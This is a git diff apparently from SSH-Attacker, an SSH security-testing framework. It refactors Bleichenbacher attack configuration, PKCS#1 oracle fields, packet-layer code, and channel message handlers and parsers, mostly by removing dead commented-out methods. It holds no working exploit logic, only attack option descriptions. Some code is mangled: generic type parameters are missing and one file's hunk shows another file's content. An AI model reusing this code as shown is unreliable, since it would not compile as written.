a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java index 75191e0e1..5aeed22e5 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java @@ -30,7 +30,6 @@ public class BleichenbacherCommandConfig extends AttackConfig { @Parameter( names = "-encrypted_secret", - required = false, description = "Encrypted secret from the CMSG_SSH_SESSION_KEY " + " message. You can retrieve this message from the Wireshark traffic. Find the" @@ -39,7 +38,6 @@ public class BleichenbacherCommandConfig extends AttackConfig { @Parameter( names = {"-cookie", "-c"}, - required = false, description = "Cookie for SessionID Calculation") private String cookie; @@ -47,18 +45,16 @@ public class BleichenbacherCommandConfig extends AttackConfig { names = {"-benchmark", "-b"}, description = "If this value is set the Attack is Benchmarked, all Encrypted-Secrets are randomly generated") - private boolean benchmark = false; + private boolean benchmark; @Parameter( - names = {"-classic"}, - required = false, + names = "-classic", description = "If this value is set the Attack is run in 'classic' mode, so no algorithm_improvements are used") private boolean classic = false; @Parameter( names = {"-keyLenght", "-k"}, - required = false, description = "Sets the oracle type for the attack, if real, the connection will be queried, otherwise it will be handeled as mock oracle. In case of the mock oracle, short means 1024 and 768 bit keys, long means 2048 and 1024 bit keys") private KeyLenght keyLenght = KeyLenght.REAL; @@ -89,15 +85,11 @@ public class BleichenbacherCommandConfig extends AttackConfig { description = "Choose if inner padding should be maniulated") private boolean outer = false; - @Parameter( - names = {"-timing"}, - required = false, - description = "Run as Timing-Attack") - private boolean timing = false; + @Parameter(names = "-timing", required = false, description = "Run as Timing-Attack") + private boolean timing; /** How many rescans should be done */ @Parameter( - names = {"-intervall"}, - required = false, + names = "-intervall", description = "define, how often the timing-attack should be tested") private int intervall = 1000; /** How many rescans should be done */ @@ -144,7 +136,7 @@ public int getNumberOfIterations() { } public void setNumberOfIterations(int mapListDepth) { - this.numberOfIterations = mapListDepth; + numberOfIterations = mapListDepth; } public boolean isBenchmark() { diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Pkcs1Attack.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Pkcs1Attack.java index 46f171247..da4586327 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Pkcs1Attack.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Pkcs1Attack.java @@ -35,8 +35,8 @@ public class Pkcs1Attack { protected BigInteger bigB; - protected double averageTimeforRequestInnerOracle = 0; - protected double averageTimeforRequestOuterOracle = 0; + protected double averageTimeforRequestInnerOracle; + protected double averageTimeforRequestOuterOracle; // Array list of longs protected ArrayList innerTimings = new ArrayList<>(); diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Pkcs1Oracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Pkcs1Oracle.java index 7a1b70d31..7cea9bce5 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Pkcs1Oracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Pkcs1Oracle.java @@ -24,9 +24,9 @@ public abstract class Pkcs1Oracle { @SuppressWarnings("FieldMayBeStatic") protected final boolean plaintextOracle = false; - protected double averageTimeforRequest = 0; - protected double averageTimeforRequestInnerOracle = 0; - protected double averageTimeforRequestOuterOracle = 0; + protected double averageTimeforRequest; + protected double averageTimeforRequestInnerOracle; + protected double averageTimeforRequestOuterOracle; /** * Gets the block size of the encryption algorithm. diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index 7fda25f4b..6217daae4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -38,7 +38,6 @@ import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParser; import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParserSSHv1; import de.rub.nds.sshattacker.core.packet.parser.BlobPacketParser; -import de.rub.nds.sshattacker.core.protocol.transport.parser.*; import java.io.IOException; import java.io.InputStream; import java.util.LinkedList; @@ -103,13 +102,11 @@ public LayerProcessingResult sendConfiguration() throws IOException { public LayerProcessingResult sendData(byte[] additionalData) throws IOException { - MessageIdConstant type = MessageIdConstant.UNKNOWN; - AbstractPacket packet; if (context.getPacketLayerType() == PacketLayerType.BLOB) { packet = new BlobPacket(); } else { - if (this.getHigherLayer().getLayerType().getName().equals("SSHV1")) { + if (getHigherLayer().getLayerType().getName().equals("SSHV1")) { LOGGER.debug("[bro] Created a Binary SSHv1 Packet"); packet = new BinaryPacketSSHv1(); } else { @@ -152,7 +149,7 @@ public void receiveMoreData() throws IOException { AbstractPacket packet; if (context.getPacketLayerType() == PacketLayerType.BINARY_PACKET) { // If we have a SSHv1 connection, parse as sshv1-packet - if (this.getHigherLayer().getLayerType().getName().equals("SSHV1")) { + if (getHigherLayer().getLayerType().getName().equals("SSHV1")) { parser = new BinaryPacketParserSSHv1( dataStream, @@ -168,7 +165,7 @@ public void receiveMoreData() throws IOException { context.getReadSequenceNumber()); packet = new BinaryPacket(); } - + // BLOB packets do not make a difference between sshv1 and sshv2 } else if (context.getPacketLayerType() == PacketLayerType.BLOB) { parser = new BlobPacketParser(dataStream); packet = new BlobPacket(); @@ -258,10 +255,10 @@ public void updateDecryptionCipher(PacketCipher decryptionCipher) { protected void decryptPacket(AbstractPacket packet) { packet.prepareComputations(); - getDecryptor().decrypt(packet); + decryptor.decrypt(packet); } protected void decompressPacket(AbstractPacket packet) { - getDecompressor().decompress(packet); + decompressor.decompress(packet); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java index 87b51cc08..f030613aa 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java @@ -24,8 +24,7 @@ import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class BinaryPacket extends AbstractPacket - implements DataContainer { +public class BinaryPacket extends AbstractPacket { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java index 7daba813d..c5a0518f7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java @@ -24,8 +24,7 @@ import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class BinaryPacketSSHv1 extends AbstractPacket - implements DataContainer { +public class BinaryPacketSSHv1 extends AbstractPacket { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializerSSHv1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializerSSHv1.java index 7509b670e..8943cf509 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializerSSHv1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializerSSHv1.java @@ -22,6 +22,7 @@ public class BinaryPacketSerializerSSHv1 extends AbstractPacketSerializer> extend // protected final T message = createMessage(); - public ProtocolMessageParser(InputStream stream) { + protected ProtocolMessageParser(InputStream stream) { super(stream); } @@ -48,7 +44,7 @@ public static ProtocolMessage delegateParsing(AbstractPacket packet, SshConte parser.parse(message); return message; } else { - final AsciiMessage message = new AsciiMessage(); + AsciiMessage message = new AsciiMessage(); AsciiMessageParser parser = new AsciiMessageParser(new ByteArrayInputStream(raw)); parser.parse(message); @@ -74,5 +70,4 @@ public static ProtocolMessage delegateParsing(AbstractPacket packet, SshConte } return null; } - } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java index 2a7baf80b..0fe9f32b2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java @@ -15,6 +15,7 @@ public abstract class SshMessageParser> extends ProtocolMessageParser { private static final Logger LOGGER = LogManager.getLogger(); + public SshMessageParser(InputStream stream) { super(stream); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelCloseMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelCloseMessageHandler.java index fc9795388..1fbeea844 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelCloseMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelCloseMessageHandler.java @@ -22,10 +22,6 @@ public ChannelCloseMessageHandler(SshContext context) { super(context); } - /*public ChannelCloseMessageHandler(SshContext context, ChannelCloseMessage message) { - super(context, message); - }*/ - @Override public void adjustContext(ChannelCloseMessage message) { Channel channel = sshContext.getChannels().get(message.getRecipientChannelId().getValue()); @@ -48,24 +44,4 @@ public void adjustContext(ChannelCloseMessage message) { message.getRecipientChannelId().getValue()); } } - - /*@Override - public ChannelCloseMessageParser getParser(byte[] array) { - return new ChannelCloseMessageParser(array); - } - - @Override - public ChannelCloseMessageParser getParser(byte[] array, int startPosition) { - return new ChannelCloseMessageParser(array, startPosition); - } - - @Override - public ChannelCloseMessagePreparator getPreparator() { - return new ChannelCloseMessagePreparator(context.getChooser(), message); - } - - @Override - public ChannelMessageSerializer getSerializer() { - return new ChannelMessageSerializer<>(message); - }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelDataMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelDataMessageHandler.java index af168eb2c..6d2cb4ab0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelDataMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelDataMessageHandler.java @@ -17,33 +17,8 @@ public ChannelDataMessageHandler(SshContext context) { super(context); } - /*public ChannelDataMessageHandler(SshContext context, ChannelDataMessage message) { - super(context, message); - }*/ - @Override public void adjustContext(ChannelDataMessage message) { // TODO: Handle ChannelDataMessage } - - /*@Override - - public ChannelDataMessageParser getParser(byte[] array) { - return new ChannelDataMessageParser(array); - } - - @Override - public ChannelDataMessageParser getParser(byte[] array, int startPosition) { - return new ChannelDataMessageParser(array, startPosition); - } - - @Override - public ChannelDataMessagePreparator getPreparator() { - return new ChannelDataMessagePreparator(context.getChooser(), message); - } - - @Override - public ChannelDataMessageSerializer getSerializer() { - return new ChannelDataMessageSerializer(message); - } */ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelEofMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelEofMessageHandler.java index 9aff364c2..22e5f612c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelEofMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelEofMessageHandler.java @@ -17,32 +17,8 @@ public ChannelEofMessageHandler(SshContext context) { super(context); } - /*public ChannelEofMessageHandler(SshContext context, ChannelEofMessage message) { - super(context, message); - }*/ - @Override public void adjustContext(ChannelEofMessage message) { // TODO: Handle ChannelEofMessage } - - /*@Override - public ChannelEofMessageParser getParser(byte[] array) { - return new ChannelEofMessageParser(array); - } - - @Override - public ChannelEofMessageParser getParser(byte[] array, int startPosition) { - return new ChannelEofMessageParser(array, startPosition); - } - - @Override - public ChannelEofMessagePreparator getPreparator() { - return new ChannelEofMessagePreparator(context.getChooser(), message); - } - - @Override - public ChannelMessageSerializer getSerializer() { - return new ChannelMessageSerializer<>(message); - }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelExtendedDataMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelExtendedDataMessageHandler.java index 00c5e9a2d..af1304aab 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelExtendedDataMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelExtendedDataMessageHandler.java @@ -18,33 +18,8 @@ public ChannelExtendedDataMessageHandler(SshContext context) { super(context); } - /*public ChannelExtendedDataMessageHandler( - SshContext context, ChannelExtendedDataMessage message) { - super(context, message); - }*/ - @Override public void adjustContext(ChannelExtendedDataMessage message) { // TODO: Handle ChannelExtendedDataMessage } - - /*@Override - public ChannelExtendedDataMessageParser getParser(byte[] array) { - return new ChannelExtendedDataMessageParser(array); - } - - @Override - public ChannelExtendedDataMessageParser getParser(byte[] array, int startPosition) { - return new ChannelExtendedDataMessageParser(array, startPosition); - } - - @Override - public ChannelExtendedDataMessagePreparator getPreparator() { - return new ChannelExtendedDataMessagePreparator(context.getChooser(), message); - } - - @Override - public ChannelExtendedDataMessageSerializer getSerializer() { - return new ChannelExtendedDataMessageSerializer(message); - }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelFailureMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelFailureMessageHandler.java index 20649f6cf..cde016958 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelFailureMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelFailureMessageHandler.java @@ -17,32 +17,8 @@ public ChannelFailureMessageHandler(SshContext context) { super(context); } - /*public ChannelFailureMessageHandler(SshContext context, ChannelFailureMessage message) { - super(context, message); - }*/ - @Override public void adjustContext(ChannelFailureMessage message) { // TODO: Handle ChannelFailureMessage } - - /*@Override - public ChannelFailureMessageParser getParser(byte[] array) { - return new ChannelFailureMessageParser(array); - } - - @Override - public ChannelFailureMessageParser getParser(byte[] array, int startPosition) { - return new ChannelFailureMessageParser(array, startPosition); - } - - @Override - public ChannelFailureMessagePreparator getPreparator() { - return new ChannelFailureMessagePreparator(context.getChooser(), message); - } - - @Override - public ChannelMessageSerializer getSerializer() { - return new ChannelMessageSerializer<>(message); - }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenConfirmationMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenConfirmationMessageHandler.java index 4ba0c37ea..b82e06b03 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenConfirmationMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenConfirmationMessageHandler.java @@ -23,11 +23,6 @@ public ChannelOpenConfirmationMessageHandler(SshContext context) { super(context); } - /*public ChannelOpenConfirmationMessageHandler( - SshContext context, ChannelOpenConfirmationMessage message) { - super(context, message); - }*/ - @Override public void adjustContext(ChannelOpenConfirmationMessage message) { Channel channel = sshContext.getChannels().get(message.getRecipientChannelId().getValue()); @@ -46,24 +41,4 @@ public void adjustContext(ChannelOpenConfirmationMessage message) { channel.setRemoteWindowSize(message.getWindowSize()); channel.setOpen(true); } - - /*@Override - public ChannelOpenConfirmationMessageParser getParser(byte[] array) { - return new ChannelOpenConfirmationMessageParser(array); - } - - @Override - public ChannelOpenConfirmationMessageParser getParser(byte[] array, int startPosition) { - return new ChannelOpenConfirmationMessageParser(array, startPosition); - } - - @Override - public ChannelOpenConfirmationMessagePreparator getPreparator() { - return new ChannelOpenConfirmationMessagePreparator(context.getChooser(), message); - } - - @Override - public ChannelOpenConfirmationMessageSerializer getSerializer() { - return new ChannelOpenConfirmationMessageSerializer(message); - }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenFailureMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenFailureMessageHandler.java index eb7b3a220..529f51843 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenFailureMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenFailureMessageHandler.java @@ -21,10 +21,6 @@ public ChannelOpenFailureMessageHandler(SshContext context) { super(context); } - /*public ChannelOpenFailureMessageHandler(SshContext context, ChannelOpenFailureMessage message) { - super(context, message); - }*/ - @Override public void adjustContext(ChannelOpenFailureMessage message) { if (!sshContext.getChannels().containsKey(message.getRecipientChannelId().getValue())) { @@ -35,24 +31,4 @@ public void adjustContext(ChannelOpenFailureMessage message) { } sshContext.getChannels().remove(message.getRecipientChannelId().getValue()); } - - /*@Override - public ChannelOpenFailureMessageParser getParser(byte[] array) { - return new ChannelOpenFailureMessageParser(array); - } - - @Override - public ChannelOpenFailureMessageParser getParser(byte[] array, int startPosition) { - return new ChannelOpenFailureMessageParser(array, startPosition); - } - - @Override - public ChannelOpenFailureMessagePreparator getPreparator() { - return new ChannelOpenFailureMessagePreparator(context.getChooser(), message); - } - - @Override - public ChannelOpenFailureMessageSerializer getSerializer() { - return new ChannelOpenFailureMessageSerializer(message); - }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenSessionMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenSessionMessageHandler.java index 1aa7b04fc..cc3615224 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenSessionMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelOpenSessionMessageHandler.java @@ -16,30 +16,6 @@ public ChannelOpenSessionMessageHandler(SshContext context) { super(context); } - /*public ChannelOpenSessionMessageHandler(SshContext context, ChannelOpenSessionMessage message) { - super(context, message); - }*/ - @Override public void adjustContext(ChannelOpenSessionMessage message) {} - - /*@Override - public ChannelOpenSessionMessageParser getParser(byte[] array) { - return new ChannelOpenSessionMessageParser(array); - } - - @Override - public ChannelOpenSessionMessageParser getParser(byte[] array, int startPosition) { - return new ChannelOpenSessionMessageParser(array, startPosition); - } - - @Override - public ChannelOpenSessionMessagePreperator getPreparator() { - return new ChannelOpenSessionMessagePreperator(context.getChooser(), message); - } - - @Override - public ChannelOpenSessionMessageSerializer getSerializer() { - return new ChannelOpenSessionMessageSerializer(message); - }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelExtendedDataMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelExtendedDataMessage.java index 419411ea0..1d8da7b68 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelExtendedDataMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelExtendedDataMessage.java @@ -84,21 +84,14 @@ public ChannelExtendedDataMessageHandler getHandler(SshContext context) { return new ChannelExtendedDataMessageHandler(context); } - /* - @Override - public ChannelExtendedDataMessageParser getParser(byte[] array) { - return new ChannelExtendedDataMessageParser(array); - } - */ - @Override public ChannelExtendedDataMessageParser getParser(SshContext context, InputStream stream) { return new ChannelExtendedDataMessageParser(stream); } @Override - public ChannelExtendedDataMessagePreparator getPreparator(SshContext context) { - return new ChannelExtendedDataMessagePreparator(context.getChooser(), this); + public ChannelExtendedDataMessagePreparator getPreparator(SshContext sshContext) { + return new ChannelExtendedDataMessagePreparator(sshContext.getChooser(), this); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParser.java index 2dab5fdfd..1e8b05e12 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParser.java @@ -12,15 +12,6 @@ public class ChannelCloseMessageParser extends ChannelMessageParser { - /* - public ChannelCloseMessageParser(byte[] array) { - super(array); - } - public ChannelCloseMessageParser(byte[] array, int startPosition) { - super(array, startPosition); - } - */ - public ChannelCloseMessageParser(InputStream stream) { super(stream); } @@ -29,9 +20,4 @@ public ChannelCloseMessageParser(InputStream stream) { public void parse(ChannelCloseMessage message) { parseProtocolMessageContents(message); } - - /* @Override - public ChannelCloseMessage createMessage() { - return new ChannelCloseMessage(); - }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParser.java index 7aeb2dd87..dbf3c0236 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParser.java @@ -18,15 +18,6 @@ public class ChannelDataMessageParser extends ChannelMessageParser { - /* - public ChannelEofMessageParser(byte[] array) { - super(array); - } - public ChannelEofMessageParser(byte[] array, int startPosition) { - super(array, startPosition); - } - */ - public ChannelEofMessageParser(InputStream stream) { super(stream); } @@ -29,9 +20,4 @@ public ChannelEofMessageParser(InputStream stream) { public void parse(ChannelEofMessage message) { parseProtocolMessageContents(message); } - - /* @Override - public ChannelEofMessage createMessage() { - return new ChannelEofMessage(); - }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParser.java index 8545b6d54..d1451c5fb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParser.java @@ -17,17 +17,6 @@ public class ChannelExtendedDataMessageParser extends ChannelMessageParser { - - /* - public ChannelExtendedDataMessageParser(byte[] array) { - super(array); - } - public ChannelExtendedDataMessageParser(byte[] array, int startPosition) { - super(array, startPosition); - } - - */ - public ChannelExtendedDataMessageParser(InputStream stream) { super(stream); } @@ -39,13 +28,6 @@ public void parse(ChannelExtendedDataMessage message) { private static final Logger LOGGER = LogManager.getLogger(); - /* - @Override - public ChannelExtendedDataMessage createMessage() { - return new ChannelExtendedDataMessage(); - } - */ - private void parseDataTypeCode(ChannelExtendedDataMessage message) { message.setDataTypeCode(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Data type code: {}", message.getDataTypeCode().getValue()); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParser.java index 9f3a31e9d..55b680da1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParser.java @@ -12,15 +12,6 @@ public class ChannelFailureMessageParser extends ChannelMessageParser { - /* - public ChannelFailureMessageParser(byte[] array) { - super(array); - } - public ChannelFailureMessageParser(byte[] array, int startPosition) { - super(array, startPosition); - } - */ - public ChannelFailureMessageParser(InputStream stream) { super(stream); } @@ -29,9 +20,4 @@ public ChannelFailureMessageParser(InputStream stream) { public void parse(ChannelFailureMessage message) { parseProtocolMessageContents(message); } - - /* @Override - public ChannelFailureMessage createMessage() { - return new ChannelFailureMessage(); - }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelMessageParser.java index e0af4e0ed..6b3ab9d38 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelMessageParser.java @@ -19,13 +19,6 @@ public abstract class ChannelMessageParser> private static final Logger LOGGER = LogManager.getLogger(); - /*public ChannelMessageParser(byte[] array) { - super(array); - } - public ChannelMessageParser(byte[] array, int startPosition) { - super(array, startPosition); - }*/ - public ChannelMessageParser(InputStream stream) { super(stream); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParser.java index f65e4def4..51342f046 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParser.java @@ -18,14 +18,6 @@ public class ChannelOpenConfirmationMessageParser private static final Logger LOGGER = LogManager.getLogger(); - /*public ChannelOpenConfirmationMessageParser(byte[] array) { - super(array); - } - - public ChannelOpenConfirmationMessageParser(byte[] array, int startPosition) { - super(array, startPosition); - }*/ - @Override public void parse(ChannelOpenConfirmationMessage message) { parseProtocolMessageContents(message); @@ -35,11 +27,6 @@ public ChannelOpenConfirmationMessageParser(InputStream stream) { super(stream); } - /* @Override - public ChannelOpenConfirmationMessage createMessage() { - return new ChannelOpenConfirmationMessage(); - } - */ private void parseSenderChannel(ChannelOpenConfirmationMessage message) { message.setSenderChannelId(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Sender channel id: {}", message.getSenderChannelId().getValue()); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParser.java index 91ff68599..f343e992e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParser.java @@ -21,13 +21,6 @@ public class ChannelOpenFailureMessageParser private static final Logger LOGGER = LogManager.getLogger(); - /*public ChannelOpenFailureMessageParser(byte[] array) { - super(array); - } - public ChannelOpenFailureMessageParser(byte[] array, int startPosition) { - super(array, startPosition); - }*/ - public ChannelOpenFailureMessageParser(InputStream stream) { super(stream); } @@ -37,13 +30,6 @@ public void parse(ChannelOpenFailureMessage message) { parseProtocolMessageContents(message); } - /* - @Override - public ChannelOpenFailureMessage createMessage() { - return new ChannelOpenFailureMessage(); - } - */ - private void parseReasonCode(ChannelOpenFailureMessage message) { message.setReasonCode(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Reason code: {}", message.getReasonCode()); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenMessageParser.java index 2c8501541..db3c995e6 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenMessageParser.java @@ -22,13 +22,7 @@ public abstract class ChannelOpenMessageParser> private static final Logger LOGGER = LogManager.getLogger(); - /* public ChannelOpenMessageParser(byte[] array) { - super(array); - } - public ChannelOpenMessageParser(byte[] array, int startPosition) { - super(array, startPosition); - }*/ - public ChannelOpenMessageParser(InputStream stream) { + protected ChannelOpenMessageParser(InputStream stream) { super(stream); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentRequestForwardingMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentRequestForwardingMessageSSHV1Handler.java index 28ba71e78..b7fd1ce1c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentRequestForwardingMessageSSHV1Handler.java +++ 